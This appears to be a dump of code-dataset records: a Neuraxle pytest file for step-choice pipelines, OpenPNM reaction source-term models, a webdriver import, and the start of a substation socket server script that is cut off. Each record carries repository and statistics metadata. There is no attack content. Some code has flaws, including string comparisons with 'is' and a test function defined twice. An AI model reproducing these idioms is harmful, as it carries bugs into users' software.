expected_callbacks_data=[
DATA_INPUTS,
[]
],
hyperparams={
'ChooseOneOrManyStepsOf__a__enabled': True,
'ChooseOneOrManyStepsOf__b__enabled': False
},
hyperparams_space={
'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
'ChooseOneOrManyStepsOf__b__enabled': Boolean()
},
expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
)
def create_test_case_multiple_steps_choosen():
a_callback = TapeCallbackFunction()
b_callback = TapeCallbackFunction()
return NeuraxleTestCase(
pipeline=Pipeline([
ChooseOneOrManyStepsOf([
('a', TransformCallbackStep(a_callback, transform_function=lambda di: di * 2)),
('b', TransformCallbackStep(b_callback, transform_function=lambda di: di * 2))
]),
]),
callbacks=[a_callback, b_callback],
expected_callbacks_data=[DATA_INPUTS, DATA_INPUTS],
hyperparams={
'ChooseOneOrManyStepsOf__a__enabled': True,
'ChooseOneOrManyStepsOf__b__enabled': True
},
hyperparams_space={
'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
'ChooseOneOrManyStepsOf__b__enabled': Boolean()
},
expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
)
def create_test_case_invalid_step_choosen():
a_callback = TapeCallbackFunction()
b_callback = TapeCallbackFunction()
return NeuraxleTestCase(
pipeline=Pipeline([
ChooseOneOrManyStepsOf([
('a', TransformCallbackStep(a_callback, transform_function=lambda di: di * 2)),
('b', TransformCallbackStep(b_callback, transform_function=lambda di: di * 2))
]),
]),
callbacks=[a_callback, b_callback],
expected_callbacks_data=[DATA_INPUTS, DATA_INPUTS],
hyperparams={
'ChooseOneOrManyStepsOf__c__enabled': True,
'ChooseOneOrManyStepsOf__b__enabled': False
},
hyperparams_space={
'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
'ChooseOneOrManyStepsOf__b__enabled': Boolean()
},
expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
)
def create_test_case_invalid_step_not_choosen():
a_callback = TapeCallbackFunction()
b_callback = TapeCallbackFunction()
return NeuraxleTestCase(
pipeline=Pipeline([
ChooseOneOrManyStepsOf([
('a', TransformCallbackStep(a_callback, transform_function=lambda di: di * 2)),
('b', TransformCallbackStep(b_callback, transform_function=lambda di: di * 2))
]),
]),
callbacks=[a_callback, b_callback],
expected_callbacks_data=[DATA_INPUTS, DATA_INPUTS],
hyperparams={
'ChooseOneOrManyStepsOf__c__enabled': False,
'ChooseOneOrManyStepsOf__b__enabled': False
},
hyperparams_space={
'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
'ChooseOneOrManyStepsOf__b__enabled': Boolean()
},
expected_processed_outputs=np.array(range(10))
)
@pytest.mark.parametrize('test_case', [
create_test_case_single_step_choosen(),
create_test_case_multiple_steps_choosen()
])
def test_choose_one_or_many_step_of_transform_should_choose_step(
test_case: NeuraxleTestCase):
p = test_case.pipeline
test =HyperparameterSpace(test_case.hyperparams_space)
p.set_hyperparams_space(test)
p.set_hyperparams(test_case.hyperparams)
outputs = p.transform(DATA_INPUTS)
assert np.array_equal(outputs, test_case.expected_processed_outputs)
assert_callback_data_is_as_expected(test_case)
def assert_callback_data_is_as_expected(test_case):
for callback, expected_callback_data in zip(test_case.callbacks, test_case.expected_callbacks_data):
if len(callback.data) > 0:
assert np.array_equal(
np.array(callback.data[0]),
expected_callback_data
)
else:
assert np.array_equal(
np.array([]),
np.array(expected_callback_data)
)
def create_test_case_fit_transform_single_step_choosen():
a_callback = TapeCallbackFunction()
b_callback = TapeCallbackFunction()
c_callback = TapeCallbackFunction()
d_callback = TapeCallbackFunction()
return NeuraxleTestCase(
pipeline=Pipeline([
ChooseOneOrManyStepsOf([
('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
]),
]),
callbacks=[a_callback, c_callback, b_callback, d_callback],
expected_callbacks_data=[
DATA_INPUTS,
(DATA_INPUTS, EXPECTED_OUTPUTS),
[],
[]
],
hyperparams={
'ChooseOneOrManyStepsOf__a__enabled': True,
'ChooseOneOrManyStepsOf__b__enabled': False
},
hyperparams_space={
'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
'ChooseOneOrManyStepsOf__b__enabled': Boolean()
},
expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
)
def create_test_case_fit_transform_multiple_steps_choosen():
a_callback = TapeCallbackFunction()
b_callback = TapeCallbackFunction()
c_callback = TapeCallbackFunction()
d_callback = TapeCallbackFunction()
return NeuraxleTestCase(
pipeline=Pipeline([
ChooseOneOrManyStepsOf([
('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
]),
]),
callbacks=[a_callback, c_callback, b_callback, d_callback],
expected_callbacks_data=[
DATA_INPUTS,
(DATA_INPUTS, EXPECTED_OUTPUTS),
DATA_INPUTS,
(DATA_INPUTS, EXPECTED_OUTPUTS)
],
hyperparams={
'ChooseOneOrManyStepsOf__a__enabled': True,
'ChooseOneOrManyStepsOf__b__enabled': True
},
hyperparams_space={
'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
'ChooseOneOrManyStepsOf__b__enabled': Boolean()
},
expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
)
def create_test_case_fit_single_step_choosen():
a_callback = TapeCallbackFunction()
b_callback = TapeCallbackFunction()
c_callback = TapeCallbackFunction()
d_callback = TapeCallbackFunction()
return NeuraxleTestCase(
pipeline=Pipeline([
ChooseOneOrManyStepsOf([
('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
]),
]),
callbacks=[a_callback, c_callback, b_callback, d_callback],
expected_callbacks_data=[
[],
(DATA_INPUTS, EXPECTED_OUTPUTS),
[],
[]
],
hyperparams={
'ChooseOneOrManyStepsOf__a__enabled': True,
'ChooseOneOrManyStepsOf__b__enabled': False
},
hyperparams_space={
'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
'ChooseOneOrManyStepsOf__b__enabled': Boolean()
},
expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
)
def create_test_case_fit_multiple_steps_choosen():
a_callback = TapeCallbackFunction()
b_callback = TapeCallbackFunction()
c_callback = TapeCallbackFunction()
d_callback = TapeCallbackFunction()
return NeuraxleTestCase(
pipeline=Pipeline([
ChooseOneOrManyStepsOf([
('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
]),
]),
callbacks=[a_callback, c_callback, b_callback, d_callback],
expected_callbacks_data=[
[],
(DATA_INPUTS, EXPECTED_OUTPUTS),
[],
(DATA_INPUTS, EXPECTED_OUTPUTS)
],
hyperparams={
'ChooseOneOrManyStepsOf__a__enabled': True,
'ChooseOneOrManyStepsOf__b__enabled': True
},
hyperparams_space={
'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
'ChooseOneOrManyStepsOf__b__enabled': Boolean()
},
expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
)
@pytest.mark.parametrize('test_case', [
create_test_case_fit_transform_single_step_choosen(),
create_test_case_fit_transform_multiple_steps_choosen()
])
def test_choose_one_or_many_step_of_fit_transform_should_choose_step(
test_case: NeuraxleTestCase):
p = test_case.pipeline
p.set_hyperparams_space(test_case.hyperparams_space)
p.set_hyperparams(test_case.hyperparams)
p, outputs = p.fit_transform(DATA_INPUTS, EXPECTED_OUTPUTS)
assert np.array_equal(outputs, test_case.expected_processed_outputs)
assert_callback_data_is_as_expected(test_case)
@pytest.mark.parametrize('test_case', [
create_test_case_fit_single_step_choosen(),
create_test_case_fit_multiple_steps_choosen()
])
def test_choose_one_or_many_step_of_fit_should_choose_step(
test_case: NeuraxleTestCase):
p = test_case.pipeline
p.set_hyperparams_space(test_case.hyperparams_space)
p.set_hyperparams(test_case.hyperparams)
p = p.fit(DATA_INPUTS, EXPECTED_OUTPUTS)
assert_callback_data_is_as_expected(test_case)
def choose_one_step_single_step_chosen_fit_transform():
a_callback = TapeCallbackFunction()
b_callback = TapeCallbackFunction()
c_callback = TapeCallbackFunction()
d_callback = TapeCallbackFunction()
return NeuraxleTestCase(
pipeline=Pipeline([
ChooseOneStepOf([
('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
]),
]),
callbacks=[a_callback, c_callback, b_callback, d_callback],
expected_callbacks_data=[
DATA_INPUTS,
(DATA_INPUTS, EXPECTED_OUTPUTS),
[],
[]
],
hyperparams={
'Pipeline__ChooseOneOrManyStepsOf__choice': 'a'
},
expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
)
def choose_one_step_single_step_chosen_fit():
a_callback = TapeCallbackFunction()
b_callback = TapeCallbackFunction()
c_callback = TapeCallbackFunction()
d_callback = TapeCallbackFunction()
return NeuraxleTestCase(
pipeline=Pipeline([
ChooseOneStepOf([
('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
]),
]),
callbacks=[a_callback, c_callback, b_callback, d_callback],
expected_callbacks_data=[
[],
(DATA_INPUTS, EXPECTED_OUTPUTS),
[],
[]
],
hyperparams={
'ChooseOneOrManyStepsOf__choice': 'a'
},
expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
)
def choose_one_step_single_step_chosen_transform():
a_callback = TapeCallbackFunction()
b_callback = TapeCallbackFunction()
c_callback = TapeCallbackFunction()
d_callback = TapeCallbackFunction()
return NeuraxleTestCase(
pipeline=Pipeline([
ChooseOneStepOf([
('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
]),
]),
callbacks=[a_callback, c_callback, b_callback, d_callback],
expected_callbacks_data=[
DATA_INPUTS,
[],
[],
[]
],
hyperparams={
'ChooseOneOrManyStepsOf__choice': 'a'
},
expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
)
@pytest.mark.parametrize('test_case', [
choose_one_step_single_step_chosen_fit_transform()
])
def test_choose_one_step_of_fit_transform_should_choose_step(
test_case: NeuraxleTestCase):
p = test_case.pipeline
p.set_hyperparams(test_case.hyperparams)
p, outputs = p.fit_transform(DATA_INPUTS, EXPECTED_OUTPUTS)
assert np.array_equal(outputs, test_case.expected_processed_outputs)
assert_callback_data_is_as_expected(test_case)
@pytest.mark.parametrize('test_case', [
choose_one_step_single_step_chosen_fit()
])
def test_choose_one_step_of_fit_should_choose_step(test_case: NeuraxleTestCase):
p = test_case.pipeline
p.set_hyperparams(test_case.hyperparams)
p = p.fit(DATA_INPUTS, EXPECTED_OUTPUTS)
assert_callback_data_is_as_expected(test_case)
@pytest.mark.parametrize('test_case', [
choose_one_step_single_step_chosen_transform()
])
def test_choose_one_step_of_fit_should_choose_step(test_case: NeuraxleTestCase):
p = test_case.pipeline
p.set_hyperparams(test_case.hyperparams)
p = p.transform(DATA_INPUTS)
assert_callback_data_is_as_expected(test_case)
def test_choose_one_step_of_invalid_chosen_step():
with pytest.raises(ValueError):
Pipeline([
ChooseOneStepOf([
('a', Identity()),
('b', Identity())
]).set_hyperparams({'choice': 'c'}),
])
@pytest.mark.parametrize("method_name, args, kwargs", [
("set_hyperparams", [{'choice': 'b'}], {}),
("update_hyperparams", [{'choice': 'b'}], {}),
("apply", ["_update_hyperparams"], {"hyperparams":{'choice': 'b'}}) # This case correspond to the update in an AutoML loop.
])
def test_choose_one_step_of_set_hyperparams(method_name, args, kwargs):
a_callback = TapeCallbackFunction()
b_callback = TapeCallbackFunction()
c_callback = TapeCallbackFunction()
d_callback = TapeCallbackFunction()
choose_one_step_of = ChooseOneStepOf([
('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2).set_name("step_1")),
('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2).set_name("step_1"))
])
p = Pipeline([
choose_one_step_of
])
p.transform(DATA_INPUTS)
assert len(a_callback.data) == 1
assert all(a_callback.data[0] == DATA_INPUTS)
assert len(b_callback.data) == 0
assert len(c_callback.data) == 0
assert len(d_callback.data) == 0
getattr(choose_one_step_of, method_name)(*args, **kwargs)
p.transform(DATA_INPUTS)
assert len(a_callback.data) == 1
assert all(a_callback.data[0] == DATA_INPUTS)
assert len(b_callback.data) == 1
assert all(b_callback.data[0] == DATA_INPUTS)
assert len(c_callback.data) == 0
assert len(d_callback.data) == 0
def test_choose_one_step_of_update_hyperparams():
a_callback = TapeCallbackFunction()
b_callback = TapeCallbackFunction()
c_callback = TapeCallbackFunction()
d_callback = TapeCallbackFunction()
choose_one_step_of = ChooseOneStepOf([
('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2).set_name("step_1")),
('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2).set_name("step_1"))
])
p = Pipeline([
choose_one_step_of
])
p.transform(DATA_INPUTS)
assert len(a_callback.data) == 1
assert all(a_callback.data[0] == DATA_INPUTS)
assert len(b_callback.data) == 0
assert len(c_callback.data) == 0
assert len(d_callback.data) == 0
choose_one_step_of.update_hyperparams({'choice': 'b'})
p.transform(DATA_INPUTS)
assert len(a_callback.data) == 1
assert all(a_callback.data[0] == DATA_INPUTS)
assert len(b_callback.data) == 1
assert all(b_callback.data[0] == DATA_INPUTS)
assert len(c_callback.data) == 0
assert len(d_callback.data) == 0
| 35.229412
| 127
| 0.659431
| 1,887
| 17,967
| 5.879703
| 0.056704
| 0.038936
| 0.058585
| 0.072645
| 0.909419
| 0.902569
| 0.880577
| 0.873997
| 0.852636
| 0.844164
| 0
| 0.01864
| 0.238604
| 17,967
| 509
| 128
| 35.298625
| 0.792398
| 0.00295
| 0
| 0.773893
| 0
| 0
| 0.079556
| 0.066324
| 0
| 0
| 0
| 0
| 0.079254
| 1
| 0.048951
| false
| 0
| 0.020979
| 0
| 0.095571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
646ffb899f12c5c91a2bba441154ea2bc6aa3775
| 16,005
|
py
|
Python
|
OpenPNM/Physics/models/generic_source_term.py
|
thirtywang/OpenPNM
|
e55ee7ae69a8be3e2b0e6bf24c9ff92b6d24e16a
|
[
"MIT"
] | 1
|
2021-03-30T21:38:26.000Z
|
2021-03-30T21:38:26.000Z
|
OpenPNM/Physics/models/generic_source_term.py
|
thirtywang/OpenPNM
|
e55ee7ae69a8be3e2b0e6bf24c9ff92b6d24e16a
|
[
"MIT"
] | null | null | null |
OpenPNM/Physics/models/generic_source_term.py
|
thirtywang/OpenPNM
|
e55ee7ae69a8be3e2b0e6bf24c9ff92b6d24e16a
|
[
"MIT"
] | 1
|
2020-07-02T02:21:10.000Z
|
2020-07-02T02:21:10.000Z
|
r"""
===============================================================================
Submodule -- generic_source_term
===============================================================================
"""
import scipy as _sp
def linear(physics, phase, A1='', A2='', x='', return_rate=True, **kwargs):
r"""
For the following source term:
.. math::
r = A_{1} x + A_{2}
If return_rate is True, it returns the value of source term for the
provided x in each pore.
If return_rate is False, it calculates the slope and intercept for the
following linear form :
.. math::
r = S_{1} x + S_{2}
Parameters
----------
A1 , A2 : string
The property name of the coefficients in the source term model.
With A2 set to zero this equation takes on the familiar for of r=kx.
x : string or float/int or array/list
The property name or numerical value or array for the main quantity
Notes
-----
Because this source term is linear in concentration (x) is it not necessary
to iterate during the solver step. Thus, when using the
``set_source_term`` method for an algorithm, it is recommended to set the
``maxiter``
argument to 0. This will save 1 unncessary solution of the system, since
the solution would coverge after the first pass anyway.
"""
if x is '':
X = _sp.ones(physics.Np) * _sp.nan
else:
if type(x) == str:
x = 'pore.' + x.split('.')[-1]
try:
X = physics[x]
except KeyError:
raise Exception(physics.name +
' does not have the pore property :' + x + '!')
else:
X = _sp.array(x)
length_X = _sp.size(X)
if length_X != physics.Np:
if length_X == 1:
X = X * _sp.ones(physics.Np)
elif length_X >= phase.Np:
X = X[physics.map_pores()]
else:
raise Exception('Wrong size for the numerical array of x!')
a = {}
source_params = [A1, A2]
for ind in _sp.arange(_sp.size(source_params)):
A = source_params[ind]
if A is '':
a[str(ind+1)] = 0
else:
if type(A) == str:
A = 'pore.' + A.split('.')[-1]
try:
a[str(ind+1)] = physics[A]
except KeyError:
raise Exception(physics.name + '/' + phase.name +
' does not have the pore property :' +
A + '!')
else:
raise Exception('source_term parameters can only be string '
'type!')
if return_rate:
return(a['1'] * X + a['2'])
else:
S1 = a['1']
S2 = a['2']
return(_sp.vstack((S1, S2)).T)
def power_law(physics, phase, A1='', A2='', A3='', x='',
return_rate=True, **kwargs):
r"""
For the following source term:
.. math::
r = A_{1} x^{A_{2}} + A_{3}
If return_rate is True, it returns the value of source term for the
provided x in each pore.
If return_rate is False, it calculates the slope and intercept for the
following linear form :
.. math::
r = S_{1} x + S_{2}
Parameters
----------
A1 -> A3 : string
The property name of the coefficients in the source term model
x : string or float/int or array/list
The property name or numerical value or array for the main quantity
Notes
-----
"""
if x is '':
X = _sp.ones(physics.Np) * _sp.nan
else:
if type(x) == str:
x = 'pore.' + x.split('.')[-1]
try:
X = physics[x]
except KeyError:
raise Exception(physics.name +
' does not have the pore property :' + x + '!')
else:
X = _sp.array(x)
length_X = _sp.size(X)
if length_X != physics.Np:
if length_X == 1:
X = X * _sp.ones(physics.Np)
elif length_X >= phase.Np:
X = X[physics.map_pores()]
else:
raise Exception('Wrong size for the numerical array of x!')
a = {}
source_params = [A1, A2, A3]
for ind in _sp.arange(_sp.size(source_params)):
A = source_params[ind]
if A is '':
a[str(ind+1)] = 0
else:
if type(A) == str:
A = 'pore.' + A.split('.')[-1]
try:
a[str(ind+1)] = physics[A]
except KeyError:
raise Exception(physics.name + '/' + phase.name +
' does not have the pore property :' +
A + '!')
else:
raise Exception('source_term parameters can only be string '
'type!')
if return_rate:
return(a['1'] * X ** a['2'] + a['3'])
else:
S1 = a['1'] * a['2'] * X ** (a['2'] - 1)
S2 = a['1'] * X ** a['2'] * (1 - a['2']) + a['3']
return(_sp.vstack((S1, S2)).T)
def exponential(physics, phase, A1='', A2='', A3='', A4='', A5='', A6='',
x='', return_rate=True, **kwargs):
r"""
For the following source term:
.. math::
r = A_{1} A_{2}^{( A_{3} x^{ A_{4} } + A_{5})} + A_{6}
If return_rate is True, it returns the value of source term for the
provided x in each pore.
If return_rate is False, it calculates the slope and intercept for the
following linear form :
.. math::
r = S_{1} x + S_{2}
Parameters
----------
A1 -> A6 : string
The property name of the coefficients in the source term model
x : string or float/int or array/list
The property name or numerical value or array for the main quantity
Notes
-----
"""
if x is '':
X = _sp.ones(physics.Np) * _sp.nan
else:
if type(x) == str:
x = 'pore.'+x.split('.')[-1]
try:
X = physics[x]
except KeyError:
raise Exception(physics.name +
' does not have the pore property :' + x + '!')
else:
X = _sp.array(x)
length_X = _sp.size(X)
if length_X != physics.Np:
if length_X == 1:
X = X * _sp.ones(physics.Np)
elif length_X >= phase.Np:
X = X[physics.map_pores()]
else:
raise Exception('Wrong size for the numerical array of x!')
a = {}
source_params = [A1, A2, A3, A4, A5, A6]
for ind in _sp.arange(_sp.size(source_params)):
A = source_params[ind]
if A is '':
if ind == 0:
a[str(ind+1)] = 1
else:
a[str(ind+1)] = 0
else:
if type(A) == str:
A = 'pore.' + A.split('.')[-1]
try:
a[str(ind+1)] = physics[A]
except KeyError:
raise Exception(physics.name + '/' + phase.name +
' does not have the pore property :' +
A + '!')
else:
raise Exception('source_term parameters can only be string '
'type!')
if return_rate:
return a['1'] * a['2'] ** (a['3'] * X ** a['4'] + a['5']) + a['6']
else:
S1 = a['1'] * a['3'] * a['4'] * \
X ** (a['4'] - 1) * _sp.log(a['2']) * \
a['2'] ** (a['3'] * X ** a['4'] + a['5'])
S2 = a['1'] * a['2'] ** (a['3'] * X ** a['4'] + a['5']) * \
(1 - a['3'] * a['4'] * _sp.log(a['2']) * X ** a['4']) + a['6']
return(_sp.vstack((S1, S2)).T)
def natural_exponential(physics, phase, A1='', A2='', A3='', A4='', A5='',
x='', return_rate=True, **kwargs):
r"""
For the following source term:
.. math::
r = A_{1} exp( A_{2} x^{ A_{3} } + A_{4} )+ A_{5}
If return_rate is True, it returns the value of source term for the
provided x in each pore.
If return_rate is False, it calculates the slope and intercept for the
following linear form :
.. math::
r = S_{1} x + S_{2}
Parameters
----------
A1 -> A5 : string
The property name of the coefficients in the source term model
x : string or float/int or array/list
The property name or numerical value or array for the main quantity
Notes
-----
"""
if x is '':
X = _sp.ones(physics.Np)*_sp.nan
else:
if type(x) == str:
x = 'pore.'+x.split('.')[-1]
try:
X = physics[x]
except KeyError:
raise Exception(physics.name +
' does not have the pore property :' + x + '!')
else:
X = _sp.array(x)
length_X = _sp.size(X)
if length_X != physics.Np:
if length_X == 1:
X = X * _sp.ones(physics.Np)
elif length_X >= phase.Np:
X = X[physics.map_pores()]
else:
raise Exception('Wrong size for the numerical array of x!')
a = {}
source_params = [A1, A2, A3, A4, A5]
for ind in _sp.arange(_sp.size(source_params)):
A = source_params[ind]
if A is '':
if ind == 0:
a[str(ind+1)] = 1
else:
a[str(ind+1)] = 0
else:
if type(A) == str:
A = 'pore.' + A.split('.')[-1]
try:
a[str(ind+1)] = physics[A]
except KeyError:
raise Exception(physics.name + '/' + phase.name +
' does not have the pore property :' +
A + '!')
else:
raise Exception('source_term parameters can only be string '
'type!')
if return_rate:
return(a['1'] * _sp.exp(a['2'] * X ** a['3'] + a['4']) + a['5'])
else:
S1 = a['1'] * a['2'] * \
a['3'] * X ** (a['3'] - 1) * \
_sp.exp(a['2'] * X ** a['3'] + a['4'])
S2 = a['1'] * (1 - a['2'] * a['3'] * X ** a['3']) * \
_sp.exp(a['2'] * X ** a['3'] + a['4']) + a['5']
return(_sp.vstack((S1, S2)).T)
def logarithm(physics, phase, A1='', A2='', A3='', A4='', A5='', A6='',
x='', return_rate=True, **kwargs):
r"""
For the following source term:
.. math::
r = A_{1} Log_{ A_{2} }( A_{3} x^{ A_{4} }+ A_{5})+ A_{6}
If return_rate is True, it returns the value of source term for the
provided x in each pore.
If return_rate is False, it calculates the slope and intercept for the
following linear form :
.. math::
r = S_{1} x + S_{2}
Parameters
----------
A1 -> A6 : string
The property name of the coefficients in the source term model
x : string or float/int or array/list
The property name or numerical value or array for the main quantity
Notes
-----
"""
if x is '':
X = _sp.ones(physics.Np)*_sp.nan
else:
if type(x) == str:
x = 'pore.' + x.split('.')[-1]
try:
X = physics[x]
except KeyError:
raise Exception(physics.name +
' does not have the pore property :' + x + '!')
else:
X = _sp.array(x)
length_X = _sp.size(X)
if length_X != physics.Np:
if length_X == 1:
X = X * _sp.ones(physics.Np)
elif length_X >= phase.Np:
X = X[physics.map_pores()]
else:
raise Exception('Wrong size for the numerical array of x!')
a = {}
source_params = [A1, A2, A3, A4, A5, A6]
for ind in _sp.arange(_sp.size(source_params)):
A = source_params[ind]
if A is '':
if ind == 0:
a[str(ind+1)] = 1
else:
a[str(ind+1)] = 0
else:
if type(A) == str:
A = 'pore.' + A.split('.')[-1]
try:
a[str(ind+1)] = physics[A]
except KeyError:
raise Exception(physics.name + '/' + phase.name +
' does not have the pore property :' +
A + '!')
else:
raise Exception('source_term parameters can only be string '
'type!')
if return_rate:
return(a['1'] * _sp.log(a['3'] * X ** a['4'] + a['5']) /
_sp.log(a['2']) + a['6'])
else:
S1 = a['1'] * a['3'] * a['4'] * \
X ** (a['4'] - 1) / \
(_sp.log(a['2']) * (a['3'] * X ** a['4'] + a['5']))
S2 = a['1'] * _sp.log(a['3'] * X ** a['4'] + a['5']) / \
_sp.log(a['2']) + a['6'] - a['1'] * a['3'] * \
a['4'] * X ** a['4'] / \
(_sp.log(a['2']) * (a['3'] * X ** a['4'] + a['5']))
return(_sp.vstack((S1, S2)).T)
def natural_logarithm(physics, phase, A1='', A2='', A3='', A4='', A5='',
x='', return_rate=True, **kwargs):
r"""
For the following source term:
.. math::
r = A_{1} Ln( A_{2} x^{ A_{3} }+ A_{4})+ A_{5}
If return_rate is True, it returns the value of source term for the
provided x in each pore.
If return_rate is False, it calculates the slope and intercept for the
following linear form :
.. math::
r = S_{1} x + S_{2}
Parameters
----------
A1 -> A5 : string
The property name of the coefficients in the source term model
x : string or float/int or array/list
The property name or numerical value or array for the main quantity
Notes
-----
"""
if x is '':
X = _sp.ones(physics.Np)*_sp.nan
else:
if type(x) == str:
x = 'pore.' + x.split('.')[-1]
try:
X = physics[x]
except KeyError:
raise Exception(physics.name +
' does not have the pore property :' + x + '!')
else:
X = _sp.array(x)
length_X = _sp.size(X)
if length_X != physics.Np:
if length_X == 1:
X = X * _sp.ones(physics.Np)
elif length_X >= phase.Np:
X = X[physics.map_pores()]
else:
raise Exception('Wrong size for the numerical array of x!')
a = {}
source_params = [A1, A2, A3, A4, A5]
for ind in _sp.arange(_sp.size(source_params)):
A = source_params[ind]
if A is '':
if ind == 0:
a[str(ind+1)] = 1
else:
a[str(ind+1)] = 0
else:
if type(A) == str:
A = 'pore.' + A.split('.')[-1]
try:
a[str(ind+1)] = physics[A]
except KeyError:
raise Exception(physics.name + '/' + phase.name +
' does not have the pore property :' +
A + '!')
else:
raise Exception('source_term parameters can only be string '
'type!')
if return_rate:
return(a['1'] * _sp.log(a['2'] * X ** a['3'] + a['4']) + a['5'])
else:
S1 = a['1'] * a['2'] * a['3'] * \
X ** (a['3'] - 1) / \
(a['2'] * X ** a['3'] + a['4'])
S2 = a['1'] * _sp.log(a['2'] * X ** a['3'] + a['4']) + \
a['5'] - a['1'] * a['2'] * a['3'] * \
X ** a['3'] / (a['2'] * X ** a['3'] + a['4'])
return(_sp.vstack((S1, S2)).T)
| 33.62395
| 79
| 0.43905
| 2,069
| 16,005
| 3.305945
| 0.070082
| 0.011111
| 0.031579
| 0.018713
| 0.937866
| 0.933041
| 0.927193
| 0.919152
| 0.906871
| 0.90424
| 0
| 0.031136
| 0.4
| 16,005
| 475
| 80
| 33.694737
| 0.681141
| 0.249422
| 0
| 0.848875
| 0
| 0
| 0.098382
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019293
| false
| 0
| 0.003215
| 0
| 0.025723
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64a32849f326d9af8291a6a179457e91dc4863b3
| 139
|
py
|
Python
|
eats/webdriver/__init__.py
|
Etiqa/eats
|
8c8e2da93d0014f6fbb208185712c5526dba1174
|
[
"BSD-2-Clause"
] | null | null | null |
eats/webdriver/__init__.py
|
Etiqa/eats
|
8c8e2da93d0014f6fbb208185712c5526dba1174
|
[
"BSD-2-Clause"
] | 5
|
2021-03-18T21:34:44.000Z
|
2022-03-11T23:35:23.000Z
|
eats/webdriver/__init__.py
|
Etiqa/eats
|
8c8e2da93d0014f6fbb208185712c5526dba1174
|
[
"BSD-2-Clause"
] | null | null | null |
from .webdriver import EatsWebDriver, SeleniumWebDriver, PytractorWebDriver, AppiumWebDriver, PytractorAppiumWebDriver, web_driver_factory
| 69.5
| 138
| 0.892086
| 11
| 139
| 11.090909
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064748
| 139
| 1
| 139
| 139
| 0.938462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
64be493fdf14a942d5bd18cc26e98d47ee4037f8
| 14,868
|
py
|
Python
|
r07.py
|
netlabcode/reader
|
9d42bef6ccb35266abec87db5a2df9bc9d77c355
|
[
"Apache-2.0"
] | null | null | null |
r07.py
|
netlabcode/reader
|
9d42bef6ccb35266abec87db5a2df9bc9d77c355
|
[
"Apache-2.0"
] | null | null | null |
r07.py
|
netlabcode/reader
|
9d42bef6ccb35266abec87db5a2df9bc9d77c355
|
[
"Apache-2.0"
] | null | null | null |
import psycopg2
from datetime import datetime
import binascii
import _thread
import time
import socket
PORT1 = 8807
def serverX():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s1:
s1.bind(('',PORT1))
s1.listen()
conn1, addr = s1.accept()
with conn1:
print('Server Substation 7 from:',addr)
